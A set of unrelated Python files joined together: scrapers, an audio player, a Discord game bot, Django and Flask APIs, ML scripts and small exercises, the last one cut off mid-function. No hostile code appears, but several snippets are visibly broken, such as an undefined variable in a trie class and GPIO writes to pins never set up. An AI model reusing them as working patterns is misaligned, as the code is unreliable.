def search_by_coordinates_random_max_n_matches(matches, lon_min, lon_max, lat_min, lat_max, scrapper):
"""
Function that allows searching in lon, lat for a maximum number of matches.
Mainly used for debugging purposes.
:param matches: Total of matches to scrap
:param lon_min: Minimum longitude
:param lon_max: Maximum longitude
:param lat_min: Minimum latitude
:param lat_max: Maximum latitude
:param scrapper: HTML or XML Scrapper
:return: a List of CadasterEntry objects
"""
results = []
counter = matches
while counter > 0:
x = random.randrange(lon_min, lon_max)
y = random.randrange(lat_min, lat_max)
x_scaled = x / config['scale']
y_scaled = y / config['scale']
try:
cadaster_entry = scrapper.process_search_by_coordinates(x_scaled, y_scaled)
if len(cadaster_entry) > 0:
results.append(cadaster_entry)
counter -= 1
if counter == 0:
break
except urllib.error.HTTPError as e:
logger.error("ERROR AT LONGITUDE {} LATITUDE {}".format(x_scaled, y_scaled))
logger.error("=============================================")
logger.error(e, exc_info=True)
logger.error("=============================================")
''' Could be a service Unavailable or denegation of service'''
sleep(config['sleep_dos_time'])
except Exception as e:
logger.error("ERROR AT LONGITUDE {} LATITUDE {}".format(x_scaled, y_scaled))
logger.error("=============================================")
logger.error(e, exc_info=True)
logger.error("=============================================")
sleep(config['sleep_time'])
logger.debug("====PROCESSING FINISHED====")
logger.debug("Results found: {}".format(matches))
return ListUtils.flat(results)
|
# inspiration from https://github.com/spatialaudio/jackclient-python/issues/59
# 1.) play a sound into output
import numpy as np
try:
import queue # Python 3.x
except ImportError:
import Queue as queue # Python 2.x
queuesize = 4000
qout = queue.Queue(maxsize=queuesize)
qin = queue.Queue(maxsize=queuesize)
# Process which gets data from qout to the waiting sound client (jackd)
def process(frames):
nothing = np.zeros(blocksize, )
if qout.empty():
print("empty")
client.outports[0].get_array()[:] = nothing
else:
data = qout.get()
if len(data) == 0:
print("empty")
client.outports[0].get_array()[:] = nothing
return 0
#print("data", data.shape, data)
#print("stats", np.min(data), np.mean(data), np.max(data))
client.outports[0].get_array()[:] = data
# Use queues to pass data to/from the audio backend
queuesize = 4000
blocksize = 1024
# Basic setup for the audio player in Python
import jack
client = jack.Client("thru_client")
client.blocksize = 1024
samplerate = client.samplerate
client.set_process_callback(process)
client.inports.register('in_{0}'.format(1))
client.outports.register('out_{0}'.format(1))
i = client.inports[0]
capture = client.get_ports(is_physical=True, is_output=True)
playback = client.get_ports(is_physical=True, is_input=True, is_audio=True)
o = client.outports[0]
timeout = blocksize / samplerate
print("Processing input in %d ms frames" % (int(round(1000 * timeout))))
# Pre-fill queues
data = np.zeros((blocksize,), dtype='float32')
for k in range(1):
qout.put_nowait(data) # the output queue needs to be pre-filled
# 2.) load processed sound (in the same way as we will generate sounds)
# we started with spectrograms
DEMO_LOAD_FROM_SPECTROGRAMS = True
DEMO_MAKE_FROM_WAV_FILE = False
if DEMO_LOAD_FROM_SPECTROGRAMS:
sample_rate = 44100
#fft_settings = [2048, 1024, 512]
fft_settings = [2048, 2024, 512] # test with longer window - should have better resolution in frq. but worse in time
# sounds better obv...
tmpname = "test1_withWindowSize2048"
fft_size = fft_settings[0]
window_size = fft_settings[1]
hop_size = fft_settings[2]
sequence_length = 40
sample_rate = 44100
if DEMO_MAKE_FROM_WAV_FILE:
from utils.audio_dataset_generator import AudioDatasetGenerator
dataset = AudioDatasetGenerator(fft_size, window_size, hop_size, sequence_length, sample_rate)
print("loading dataset from a wav file")
audio_data_path = "/media/vitek/Data/Vitek/Projects/2019_LONDON/music generation/small_file/"
dataset.load(audio_data_path, force=True, prevent_shuffling=True)
tmp_y_frames = dataset.y_frames[0:6000]
#import numpy as np
#np.save("data/tmp_y_frames_6000NoShuffle.npy", dataset.y_frames[0:6000])
else:
import numpy as np
tmp_y_frames = np.load("data/tmp_y_frames_6000NoShuffle.npy")
print("using converted spectrograms")
print("tmp_y_frames hard loaded:", tmp_y_frames.shape)
def griffin_lim(stftm_matrix, max_iter=100):
""""Iterative method to 'build' phases for magnitudes."""
fft_size = fft_settings[0]
window_size = fft_settings[1]
hop_size = fft_settings[2]
stft_matrix = np.random.random(stftm_matrix.shape)
y = librosa.core.istft(stft_matrix, hop_size, window_size)
for i in range(max_iter):
stft_matrix = librosa.core.stft(y, fft_size, hop_size, window_size)
stft_matrix = stftm_matrix * stft_matrix / np.abs(stft_matrix)
y = librosa.core.istft(stft_matrix, hop_size, window_size)
return y
window_size = 1024
griffin_iterations = 60
predicted_magnitudes = np.asarray(tmp_y_frames[500])
#predicted_magnitudes = np.zeros(1025, )
for prediction in tmp_y_frames[500+1:2500+1]:
predicted_magnitudes = np.vstack((predicted_magnitudes, prediction))
predicted_magnitudes = np.array(predicted_magnitudes).reshape(-1, window_size + 1)
print("predicted_magnitudes", predicted_magnitudes.shape)
# predicted_magnitudes (2001, 1025)
import librosa
# and convert the spectrograms to audio signal
audio = [griffin_lim(predicted_magnitudes.T, griffin_iterations)]
audio = np.asarray(audio[0])
print("audio.shape", audio.shape)
# window size 2048 => audio.shape (1024000,)
###### or directly reload audio signal:
"""
audio = np.load("data/tmp_audio_reconstructed.npy")
audio = np.asarray(audio[0])
print("audio hard loaded:", audio.shape)
"""
sample_rate = 44100
print("saving the audio file for inspection into data/testconcept2_testing"+tmpname+".wav")
librosa.output.write_wav('data/testconcept2_testing_'+tmpname+'.wav', audio, sample_rate)
def get_audio_random():
data = np.random.rand(blocksize, )
qin.put(data)
def get_audio_capture():
datain=client.inports[0].get_array()
qin.put(datain)
def get_audio_part_from_reconstructed_file(lenght = 1024, k=0):
data = audio[lenght*k:lenght*(k+1)]
qin.put(data)
# Simple example, the audio client finally starts and is fed one by one what to play
# - we get audio (generate/random/load) to qin
# - this one sample of 1024 is taken from qin and put into qout
# - client calls a process function of it (taking it from qout into the audio buffer)
k = 0
with client:
i.connect(capture[0])
# Connect mono file to stereo output
o.connect(playback[0])
o.connect(playback[1])
while True:
# Each one of these saves only one batch of audio of the size of 1024 samples
if DEMO_LOAD_FROM_SPECTROGRAMS:
get_audio_part_from_reconstructed_file(lenght=1024, k=k)
else:
get_audio_random()
#get_audio_capture()
data = qin.get()
qout.put(data)
k += 1
|
# Uses python3
import sys
def get_fibonacci_last_digit(n):
# arr = [1,1]
if (n <= 1):
return n
else:
last_digits = [0]*60
last_digits[0] = 0
last_digits[1] = 1
for i in range(2, 60):
last_digits[i] = (last_digits[i-1] + last_digits[i-2]) % 10
return last_digits[n % 60]
if __name__ == '__main__':
n = int(input())
print(get_fibonacci_last_digit(n))
|
import discord
from discord.ext import commands
from discord.ext.commands import cog
from pymongo import MongoClient
import os
from dotenv import load_dotenv
import asyncio
from tools import _db, embeds, combat, _json, tools, _c
import asyncio
from discord_components import DiscordComponents, Button, ButtonStyle, InteractionType
intents = discord.Intents.default()
intents.members = True
client = discord.Client(intents=intents)
load_dotenv('.env')
dbclient = MongoClient(os.getenv('DBSTRING1'))
db = dbclient[os.getenv('DBSTRING2')]
class pvp(commands.Cog):
def __init__(self, client):
self.client = client
@commands.Cog.listener()
async def on_ready(self):
DiscordComponents(self.client)
print ('pvp.py -> on_ready()')
@commands.command()
async def pvp(self, ctx, target: discord.Member, param=None):
# PROFILE CHECKS
if (await _db.profile_check(ctx.author.id) == 0):
await ctx.send(embed=discord.Embed(color=0xadcca6, description = f"**{ctx.author.name}#{ctx.author.discriminator}** I couldn't find any profile linked to your account. Do `ax createprofile` to create one. Please join the [Support Server](https://discord.gg/2TCQtNs8kN) if you believe this is a mistake."))
return
if (await _db.profile_check(target.id) == 0):
await ctx.send(embed=discord.Embed(color=0xadcca6, description = f"**{ctx.author.name}#{ctx.author.discriminator}** The user you're challenging doesn't have a Project Ax profile yet. Do `ax createprofile` to create one. Please join the [Support Server](https://discord.gg/2TCQtNs8kN) if you believe this is a mistake."))
return
buttons_1 = [
Button(style=1, label=_c.accept(), custom_id="accept_pvp"),
Button(style=4, label=_c.deny(), custom_id="deny_pvp")
],
pvp_message = await ctx.send(embeds.pvp_message(target.display_name, ctx.author.display_name), components=list(buttons_1))
def checkforR(res):
return res.user.id == target.id and res.channel.id == ctx.channel.id
try:
res = await self.client.wait_for("button_click", check=checkforR, timeout=15)
await res.respond(type=6)
except asyncio.TimeoutError:
await _c.timeout_button(pvp_message)
return
if res.component.label == _c.deny():
await _c.cancel(pvp_message)
return
if res.component.label == _c.accept():
await _c.clear(pvp_message)
# select weapons
try:
weapon_p = await combat.weapon_select(ctx.author, pvp_message, self.client, ctx.channel.id)
await _c.clear(pvp_message)
weapon_e = await combat.weapon_select(target, pvp_message, self.client, ctx.channel.id)
await _c.clear(pvp_message)
except asyncio.TimeoutError:
await _c.timeout_button(pvp_message)
return
except:
await _c.cancel(pvp_message)
return
# get players stats
# player
p_atk = combat.get_player_stats(weapon_p)[0]
p_acc = combat.get_player_stats(weapon_p)[1]
p_def = combat.get_player_stats(weapon_p)[2]
p_hp = 500
p_start_hp = 500
# enemy
e_atk = combat.get_player_stats(weapon_e)[0]
e_acc = combat.get_player_stats(weapon_e)[1]
e_def = combat.get_player_stats(weapon_e)[2]
e_hp = 500
e_start_hp = 500
# some extra needed variables
thumnail = "https://media.discordapp.net/attachments/804705780557021214/840565105959632926/pixil-frame-0_37.png"
title = "TempTitle/pvp"
enemy = target.display_name
player = ctx.author.display_name
hit_or_miss_p = ""
hit_or_miss_d = ""
miss_counter_p = ""
miss_counter_d = ""
hit_counter_p = ""
hit_counter_d = ""
player_move_indicator = ""
enemy_move_indicator = ""
comment = "Happy Project Ax fighting, and may the odds be ever in your favor."
moves = 0
# display embed before actual combat
def display_pvp_embed():
return embeds.pvp_combat_embed(p_hp, p_atk, p_acc, p_def, e_hp, e_atk, e_acc, e_def, thumnail, title, enemy, player, comment, hit_or_miss_p, hit_or_miss_d, miss_counter_p, miss_counter_d, hit_counter_p, hit_counter_d, moves, player_move_indicator, enemy_move_indicator, tools.ismain())
await pvp_message.edit(embed=display_pvp_embed())
await pvp_message.edit(content=f"**{player}** Your turn! Click a button to make a move.\n\n{comment}")
healing_potion_emote = self.client.get_emoji(_json.get_emote_id("healing_potion"))
# add buttons
buttons_2 = [
Button(style=4, label="ATK", emoji='⚔️', custom_id="ATK_pvp"),
Button(style=1, label="DEF", emoji='🛡️', custom_id="DEF_pvp"),
Button(style=3, label="Heal", emoji=healing_potion_emote, custom_id="Heal_pvp"),
],
await pvp_message.edit(components=list(buttons_2))
def checkforR2(res):
return res.user.id == target.id and res.channel.id == ctx.channel.id
def checkforR3(res):
return res.user.id == ctx.author.id and res.channel.id == ctx.channel.id
# pvp starts
while p_hp > 0 and e_hp > 0:
if moves%2 != 0:
## PLAYER MOVE
await pvp_message.edit(content=f"**{player}** Your turn! Click a button to make a move.\n\n{comment}")
try:
res = await self.client.wait_for('button_click', timeout=10, check=checkforR3)
await res.respond(type=6)
except:
await _c.timeout_button(pvp_message)
return
if res.component.label.startswith("ATK"):
e_hp = combat.pvp_atk(e_hp, p_atk, p_acc, e_def, player)[1]
comment = str(combat.pvp_atk(e_hp, p_atk, p_acc, e_def, player)[2])
elif res.component.label.startswith("DEF"):
pass
elif res.component.label.startswith("Heal"):
incr = p_hp*0.1
if p_hp != p_start_hp:
if p_start_hp < (p_hp+incr):
incr = p_start_hp - p_hp
p_hp += incr
comment = f"{player} healed! Their health increased with {incr} points."
else:
if p_hp == p_start_hp:
comment = f"{player} tried to heal but their health is already maxed."
else:
## ENEMY MOVE
await pvp_message.edit(content=f"**{enemy}** Your turn! React to this message to make a move.\n\n{comment}")
try:
res = await self.client.wait_for('button_click', timeout=10, check=checkforR2)
await res.respond(type=6)
except:
await _c.timeout_button(pvp_message)
return
await pvp_message.edit(embed=display_pvp_embed())
await pvp_message.edit(content=f"{pvp_message.content}\n\n{comment}")
comment = ""
moves+=1
def setup(client):
client.add_cog(pvp(client))
|
from rest_framework import permissions
from rest_framework import viewsets, status, mixins
from rest_framework.generics import get_object_or_404
from rest_framework.response import Response
from posts.api import serializers
from posts.api.pagination import PostPagination, LikePagination
from posts.api.serializers import get_like_serializer
from posts.models import Post, Like
class PostCRSet(mixins.CreateModelMixin, mixins.ListModelMixin, viewsets.GenericViewSet):
queryset = Post.objects.all()
serializer_class = serializers.PostDetailSerializer
permission_classes = [permissions.IsAuthenticated]
pagination_class = PostPagination
def perform_create(self, serializer):
serializer.save(user=self.request.user)
def get(self, request, id=None, **kwargs):
queryset = Post.objects.all()
post = get_object_or_404(queryset, pk=id)
serializer = serializers.PostDetailSerializer(post)
return Response(serializer.data)
class LikeCreateListDeleteViewSet(mixins.CreateModelMixin, mixins.ListModelMixin, viewsets.GenericViewSet):
queryset = Like.objects.all()
permission_classes = [permissions.IsAuthenticated]
post_id_qs_param = 'post_id'
pagination_class = LikePagination
def perform_create(self, serializer):
post_id = self.kwargs.get(self.post_id_qs_param)
serializer.save(user_id=self.request.user.id, post_id=post_id)
def list(self, request, **kwargs):
post_id = self.kwargs.get(self.post_id_qs_param)
queryset = Like.objects.filter(post_id=post_id).order_by("-created_at")
page = self.paginate_queryset(queryset)
if page is not None:
serializer = self.get_serializer(page, many=True)
return self.get_paginated_response(serializer.data)
serializer = self.get_serializer(queryset, many=True)
return Response(serializer.data)
def get_serializer_class(self):
post_id = self.kwargs.get(self.post_id_qs_param)
return get_like_serializer(
post_id=post_id,
user=self.request.user
)
|
import numpy as np
import pandas as pd
import sys, requests, time
root_path = '/home/samir/Statistics/football/'
sys.path.append(root_path)
from football_utilities import split_espn_plr
def get_espn_proj_wk(wk):
url_str = 'http://games.espn.com/ffl/tools/projections?&scoringPeriodId=%d&seasonId=2016&slotCategoryId=%d&startIndex=%d'
columns = ['Player', 'Opp', 'GameTime', 'Cmp_Att', 'PsYds', 'PsTD', 'Int', 'RsAtt', 'RsYds', 'RsTD', 'Rec', 'RcYds', 'RcTD', 'FFPts']
proj = pd.DataFrame()
keep_going = True
for id, pos in zip([0, 2, 4, 6, 16, 17], ['QB', 'RB', 'WR', 'TE', 'DST', 'K']):
idx = 0
while True:
url = url_str %(wk, id, idx)
print pos, idx
r = requests.get(url)
d = pd.read_html(r.content, attrs={'id': 'playertable_0'})
assert len(d) == 1
d = d[0]
if d.shape[0] == 1:
break
d.drop(range(2), inplace=True)
d.columns = columns
d.insert(2, 'Pos', pos)
proj = pd.concat([proj, d])
idx += 40
info = proj.Player.apply(split_espn_plr)
proj['Player'] = [i[0] for i in info]
proj.insert(2, 'Team', [i[1] for i in info])
proj = proj.replace('--', np.nan)
proj = proj.apply(pd.to_numeric, errors='ignore')
proj.reset_index(drop=True, inplace=True)
proj.to_csv('Data/Projections/ESPN/Wk%d/ESPN_Projections_2016Wk%d_%s.csv' %(wk, wk, time.strftime('%Y%m%d')), index=False)
return proj
|
#!~/anaconda3/bin/python3.6
# encoding: utf-8
"""
@author: Yongbo Wang
@file: ToxicClassification - Tune_dropout_rate.py
@time: 9/2/18 8:30 AM
"""
import numpy as np
import pandas as pd
from keras.preprocessing.text import Tokenizer
from keras.preprocessing.sequence import pad_sequences
from keras.layers import Dense, Input, LSTM, Embedding, Dropout
from keras.layers import Bidirectional, GlobalMaxPool1D
from keras.models import Model
from keras import optimizers
from sklearn.model_selection import GridSearchCV
from keras.wrappers.scikit_learn import KerasClassifier
DATA_PATH = '../input'
EMBEDDING_FILE = f'{DATA_PATH}/glove6b50d/glove.6B.50d.txt'
TRAIN_DATA_FILE = f'{DATA_PATH}/train.csv'
TEST_DATA_FILE = f'{DATA_PATH}/test.csv'
embed_size = 50
max_features = 20000
maxlen = 100
train = pd.read_csv(TRAIN_DATA_FILE)
test = pd.read_csv(TEST_DATA_FILE)
list_sentences_train = train["comment_text"].fillna("_na_").values
list_classes = ["toxic", "severe_toxic", "obscene", "threat", "insult", "identity_hate"]
y = train[list_classes].values
list_sentences_test = test["comment_text"].fillna("_na_").values
tokenizer = Tokenizer(num_words=max_features)
tokenizer.fit_on_texts(list(list_sentences_train))
list_tokenized_train = tokenizer.texts_to_sequences(list_sentences_train)
list_tokenized_test = tokenizer.texts_to_sequences(list_sentences_test)
X_t = pad_sequences(list_tokenized_train, maxlen=maxlen)
X_te = pad_sequences(list_tokenized_test, maxlen=maxlen)
def get_trans(word, *arr):
return word, np.asarray(arr, dtype='float32')
embeddings_index = dict(get_trans(*o.strip().split()) for o in open(EMBEDDING_FILE))
all_embs = np.stack(embeddings_index.values())
emb_mean, emb_std = all_embs.mean(), all_embs.std()
word_index = tokenizer.word_index
nb_words = min(max_features, len(word_index))
embedding_matrix = np.random.normal(emb_mean, emb_std, (nb_words, embed_size))
for word, i in word_index.items():
if i >= max_features:
continue
embedding_vector = embeddings_index.get(word)
if embedding_vector is not None:
embedding_matrix[i] = embedding_vector
def create_model(dropout_rate=0.0):
inp = Input(shape=(maxlen,))
x = Embedding(max_features, embed_size, weights=[embedding_matrix])(inp)
x = Bidirectional(LSTM(50, return_sequences=True, dropout=0.1, recurrent_dropout=0.1))(x)
x = GlobalMaxPool1D()(x)
x = Dense(50, activation="relu")(x)
x = Dropout(dropout_rate)(x)
x = Dense(6, activation="sigmoid")(x)
model = Model(inputs=inp, outputs=x)
optimizer = optimizers.Adam(lr=0.001)
model.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])
return model
model = KerasClassifier(build_fn=create_model, verbose=0)
dropout_rate = [0.0, 0.1, 0.2, 0.3, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9]
param_grid = dict(dropout_rate=dropout_rate)
grid = GridSearchCV(estimator=model, param_grid=param_grid, n_jobs=-1, cv=3)
grid_result = grid.fit(X_t, y, verbose=1, batch_size=10, epochs=2, validation_split=0.1)
print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))
means = grid_result.cv_results_['mean_test_score']
stds = grid_result.cv_results_['std_test_score']
params = grid_result.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
print("%f (%f) with: %r" % (mean, stdev, param))
|
from behave import given, when, then
@given('character creation is "{state}"')
def step_impl(context, state):
if (state == 'shown') != context.browser.find_element_by_css_selector('form.char-form').is_displayed():
context.browser.find_element_by_id('add-char').click()
@when('user toggles character creation')
def step_impl(context):
context.browser.find_element_by_id('add-char').click()
@then('character form is "{display}"')
def step_impl(context, display):
assert (display == 'shown') is context.browser.find_element_by_css_selector('form.char-form').is_displayed()
|
#054: Introduction to Pattern Matching
#http://rosalind.info/problems/trie/
#Given: A list of at most 100 DNA strings of length at most 100 bp, none of which is a prefix of another.
L = ['ATAGA', 'ATC', 'GAT']
#L = ['apple', 'apropos', 'banana', 'bandana', 'orange']
#If parsing from file:
f = open('rosalind_trie.txt', 'r')
contents = f.read()
L = contents.strip().split('\n')
#Return: The adjacency list corresponding to the trie T for these patterns, in the following format. If T has n nodes, first label the root with 1 and then label the remaining nodes with the integers 2 through n in any order you like. Each edge of the adjacency list of T will be encoded by a triple containing the integer representing the edge's parent node, followed by the integer representing the edge's child node, and finally the symbol labeling the edge.
class Node:
def __repr__(self):
return "Node: " + self.label
def __init__(self, label):
self.label = str(label)
self.edges = []
def add(self, letter, n):
edges.append((letter, n))
def getRootNode(L):
# can't use nonlocal keyword in python 2.7
outer = {'label': 1}
def removeFirstLetter(L, letter):
newL = [l[1:] for l in L if l[0] == letter]
return filter(None, newL)
def nextNodeEdgePairs(L):
if not L:
return []
enpair = []
for l in L:
# if not already existing as an edge:
if l[0] not in [letter for (letter, node) in enpair]:
# create a new node and add it to the enpair list
#nonlocal label
newnode = Node(outer['label'])
outer['label'] += 1
enpair.append((l[0], newnode))
# for this new node, repeat the procedure with the list with the first letter chopped off:
newL = removeFirstLetter(L, l[0])
newnode.edges += nextNodeEdgePairs(newL)
return enpair
root = Node(outer['label'])
outer['label'] += 1
root.edges += nextNodeEdgePairs(L)
return root
def getAdjList(node):
L = []
for en in node.edges:
L.append((node.label, en[1].label, en[0]))
L += getAdjList(en[1])
return L
root = getRootNode(L)
listings = getAdjList(root)
#for l in listings:
#print ' '.join([p for p in l])
#If writing to file:
w = open('rosalind_trie_output.txt','w')
for l in listings:
w.write(' '.join([p for p in l]) + '\n')
w.close()
|
#! python3
'''
To add a prefix to the start of the filename, such as adding spam_ to
rename eggs.txt to spam_eggs.txt
'''
import os, shutil
#TODO:ask user for prefix
filename_prefix = input('Enter the prefix that you want to add:\n')
#TODO:list all the files from the directory and rename them with prefix added
for filenames in os.listdir('.'):
#ignore 'rename.py' code file
if filenames == 'rename.py':
continue
#add prefix to filename
newfilename = filename_prefix + filenames
abs_path = os.path.abspath('.')
filename_path = os.path.join(abs_path, filenames)
newfilename_path = os.path.join(abs_path, newfilename)
#rename all the files using shutil module
shutil.move(filename_path, newfilename_path)
#ignore
input('Enter \'ENTER\' to quit()') |
import unittest
import elektra
import pandas as pd
import datetime as dt
class ElektraTests(unittest.TestCase):
def test_hello_elektra(self):
# simple test to verify tests are executing
result = elektra.hello()
self.assertEqual(result, 'elektra says hi')
def test_create_price_method(self):
# happy path test through the elektra create price method
# create a panda from the test csv file
prices = pd.read_csv('tests/created_prices.csv')
# call the create prices method and compare results
result = elektra.create_prices(dt.datetime.strptime('2020-10-17','%Y-%m-%d'),'M.P4F8', 'INDIANA.HUB', 'miso','2x16','Daily', prices)
self.assertEqual(result,22.779374999999998)
def test_scrub_price_method(self):
# happy path test through the elektra scrub price method
# create a panda from the test csv file
prices = pd.read_csv('tests/scrub_hourly_prices.csv')
# call the create prices method and compare results
result = elektra.scrub_hourly_prices(dt.datetime.strptime('2020-10-17','%Y-%m-%d'),'M.YERX', '116013753', 'pjm', prices)
self.assertTrue(result.to_csv,'test-data/scrub_hourly_prices_result.csv')
if __name__ == '__main__':
unittest.main() |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2018-03-28 09:29
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('coddy', '0006_auto_20180327_1710'),
]
operations = [
migrations.CreateModel(
name='Kid',
fields=[
('id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=30)),
('surname', models.CharField(max_length=30)),
('image', models.ImageField(upload_to='media/img')),
('disc', models.CharField(max_length=300)),
],
options={
'verbose_name': 'Ребенок',
'verbose_name_plural': 'Дети',
},
),
migrations.AlterField(
model_name='donate',
name='time',
field=models.TimeField(blank=True, default=datetime.datetime(2018, 3, 28, 12, 29, 51, 271395)),
),
migrations.AlterField(
model_name='volunteer',
name='time',
field=models.TimeField(blank=True, default=datetime.datetime(2018, 3, 28, 12, 29, 51, 271853)),
),
]
|
# python 2.7.3
import sys
import math
n = input()
a = 2
for i in range(2, n + 1):
if a % (2 ** i) == 0:
a += 2 * 10 ** (i - 1)
else:
a += 10 ** (i - 1)
print a
|
"""
多进程文件计数
"""
import os
import atexit
import multiprocessing
import json
import time
class Count(object):
def __init__(self, n):
self.n = n
self.num = 0
# atexit.register(self.dump_file)
def _count(self, path, count_type='.mp3'):
path = os.path.abspath(path)
path_list = os.listdir(path)
num = 0
# add_path = False
for p in path_list:
new_p = path + '/' + p
if count_type in p:
# add_path = True
self.file_list.append(p)
self.num += 1
num += 1
# print(' ' * 90, end='\r')
# print(path, p, num, self.num, end='\r')
elif os.path.isdir(new_p):
self._count(new_p)
self.sche_dict[self.n] = self.num
# if add_path:
# self.path_map[path] = num
# # print(self.path_map)
def count(self, pl, sche_dict, file_list):
self.sche_dict = sche_dict
self.file_list = file_list
self.sche_dict[self.n] = 0
for i in pl:
self._count(i)
def dump_file(shce_dict, file_list):
s = '█'
print('dump to file....')
with open('count.count', 'w') as f:
allnum = sum(shce_dict.values())
f.write('num: %s\n\n' % allnum)
print('transf dict...')
file_list = list(file_list)
length = len(file_list)
c = 0
print('write to file...')
for i in file_list:
c += 1
if c % 1000 == 0:
print('%s%%' % round(c / length * 100, 1), '\x1b[?25l|' + format(s * int(c / length * 41), '<40') + '|', '%s/%s' % (c, length), ' ' * 20, end='\r')
time.sleep(0.2)
f.write('%s \n' % i)
else:
print('100%', '\x1b[?25l|' + format(s * int(c / length * 41), '<40') + '|', '%s/%s' % (c, length), ' ' * 20)
print('done')
def e(*args):
print(args)
def s(*args):
pass
def mmain():
pool = multiprocessing.Pool(8)
m = multiprocessing.Manager()
shce_dict = m.dict()
file_list = m.list()
process_list = []
for i in range(8):
j = i + 1
k = i * 128
j *= 128
path_list = [str(x) for x in range(k, j)]
c = Count(str(i))
a = pool.apply_async(c.count, args=(path_list, shce_dict, file_list), error_callback=e, callback=s)
process_list.append(a)
pool.close()
while 1:
l = [x.ready() for x in process_list]
if all(l):
break
else:
time.sleep(1)
print(l)
print(shce_dict)
print('all num: %s' % sum(shce_dict.values()))
dump_file(shce_dict, file_list)
# def main(path):
# c = Count('')
# c.count(path)
if __name__ == '__main__':
# main(['/repertory/capture/downloads/tencent/mp3'])
mmain()
|
from django import template
register = template.Library()
@register.simple_tag(takes_context=True)
def activate(context, *paths):
"""
For use in navigation. Returns "active" if the navigation page
is the same as the page requested.
The 'django.template.context_processors.request' context processor
must be activated in your settings.
In an exception, django doesnt use a RequestContext, so we can't
necessarily always assume it being present.
"""
if 'request' in context:
return bool(context['request'].path in paths) and "active" or ""
return ''
|
#!/bin/python3
def game_of_thrones_i(s):
letters = [0] * 26
for char in s:
letters[ord(char)-97] += 1
letters = [x for x in letters if x % 2 != 0]
return 'YES' if len(letters) <= 1 else 'NO'
def main():
print(game_of_thrones_i(input().strip()))
main() |
import os
from process_handle_ps import ProcessHandlePs
from process_provider import ProcessProvider
class ProcessProvider_PS(ProcessProvider):
"""
Process provider on top of the "ps" utility.
"""
def _collect_all(self):
return os.popen('ps ax -o %s' % (','.join(ProcessHandlePs.ATTRS))).readlines()
def _collect_set(self, pidset):
return os.popen('ps -p %s -o %s' % (
','.join(map(str, pidset)), ','.join(ProcessHandlePs.ATTRS))).readlines()
def _translate_line_to_pid_pair(self, line):
sline = line.split()
try:
return (int(sline[ProcessHandlePs.ATTRS.index('pid')]),
int(sline[ProcessHandlePs.ATTRS.index('ppid')]))
except:
return None, None
def _translate_line_to_handle(self, line):
return ProcessHandlePs.from_line(line)
@staticmethod
def _platform_compatible():
# Compatible with any Unix flavor with SUSv2+ conformant 'ps'.
return True
|
from flask import Flask, jsonify, request
from sklearn.externals import joblib
import pandas as pd
import os
app = Flask(__name__)
#route our app to domain/predictiris , accept POST requests
@app.route('/predictiris', methods=['POST'])
def irisapi():
'''our main function that handles our requests and delivers classified data in json format'''
#Recieve our json data from our client, create a dataframe.
try:
postjson = request.json
clientdata = pd.DataFrame(postjson)
except Exception as e:
raise e
#Evaluate whether we have data, if we don't return bad_request
if clientdata.empty:
return(bad_request())
#load our iris clf model
pklclf = 'irisclassifier.pkl'
clf = joblib.load(f'./models/{pklclf}')
#classify our clients data
y_pred = clf.predict(clientdata)
#Decode our encoded data lables, so the client recieves lables not encoded values
fnames = {0:'Setosa',1:'Versicolor',2:'Virginica'}
#list comprehension, applying our function to get the labels and placing in our dataframe
clientdata['PredictedIris'] = [fnames.get(x, x) for x in y_pred]
#return json data to our client, give status code 200 - OK response contains a payload
apiresponse = jsonify(predictions=clientdata.to_json(orient="records"))
apiresponse.status_code = 200
return (apiresponse)
if __name__ == "__main__":
app.run() |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import lylidatabase
l = lylidatabase.LyliDatabase('links.txt', 'access.log')
while True:
print l.request(raw_input())
|
import os
os.environ["GOOGLE_APPLICATION_CREDENTIALS"]="keys.json"
from bq_helper import BigQueryHelper
import plotly.graph_objs as go
from plotly.offline import plot
os.environ["GOOGLE_APPLICATION_CREDENTIALS"]="keys.json"
bq_assistant = BigQueryHelper('bigquery-public-data', 'san_francisco')
QUERY = """
SELECT station_id, docks_available, bikes_available, time
FROM `bigquery-public-data.san_francisco.bikeshare_status`
LIMIT 10
"""
df = bq_assistant.query_to_pandas(QUERY)
id_bike_df = df[df['station_id']==90]
bike_id_groupby = id_bike_df.groupby(['docks_available'])['bikes_available'].sum()
trace1 = go.Scatter(
x=bike_id_groupby.index,
y=bike_id_groupby.values,
mode = "lines",
name = "request_status")
trace3 = go.Bar(x=['87', '90', '91'],
y=[1, 8, 2])
layout_1 = dict(
title = 'bikeshare_status',
xaxis= dict(title= 'station_id'),
yaxis=dict(title='bikes_available'),
)
layout_2 = dict(
title = 'status_of_request',
xaxis= dict(title= 'station_id'),
yaxis=dict(title='docks_available'),
)
fig_1 = dict(data = [trace1], layout = layout_1)
plot(fig_1)
fig_2 = dict(data = [trace3], layout = layout_2)
plot(fig_2) |
#!/usr/bin/env python
import RPi.GPIO as GPIO
import time
GPIO.setmode(GPIO.BOARD)
GPIO.setup(21, GPIO.OUT)
GPIO.output(22,True)
GPIO.output(23,True)
GPIO.output(24, True)
time.sleep(2)
GPIO.output(24, False)
time.sleep(2)
|
import numpy as np
import random as random
import math
import re
import sys
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
def generate_flips(N,theta):
gen_values = np.array([random.random() for i in range(N)])
output = (gen_values < theta)*1
return output
def make_data_flips(N,theta):
samps = list((generate_flips(N,theta)))
output = ( ", ".join( str(e) for e in samps ) )
f = open('data.out', 'w')
f.write(output)
def prior(theta,a,b):
# beta prior
coeff = 1/((math.gamma(a)*math.gamma(b))/(math.gamma(a+b)))
p_theta = coeff*(theta**(a-1)*(1-theta)**(b-1))
return p_theta
def likelihood(y,theta):
z = sum(y)
N = len(y)
likel = (theta**z)*(1-theta)**(N-z)
return likel
def kposterior(theta,y):
likel = likelihood(y,theta)
prior_val = prior(theta,1,1)
posterior = likel*prior_val
return posterior
def makekposterior(file):
y = np.loadtxt(file, comments="#", delimiter=",", unpack=False)
theta = np.linspace(0,1,100)
posterior = likelihood(y,theta)*prior(theta,1,1)
f_out = open('kpost.out', 'w')
theta_out = ( ", ".join( str(e) for e in theta ) )
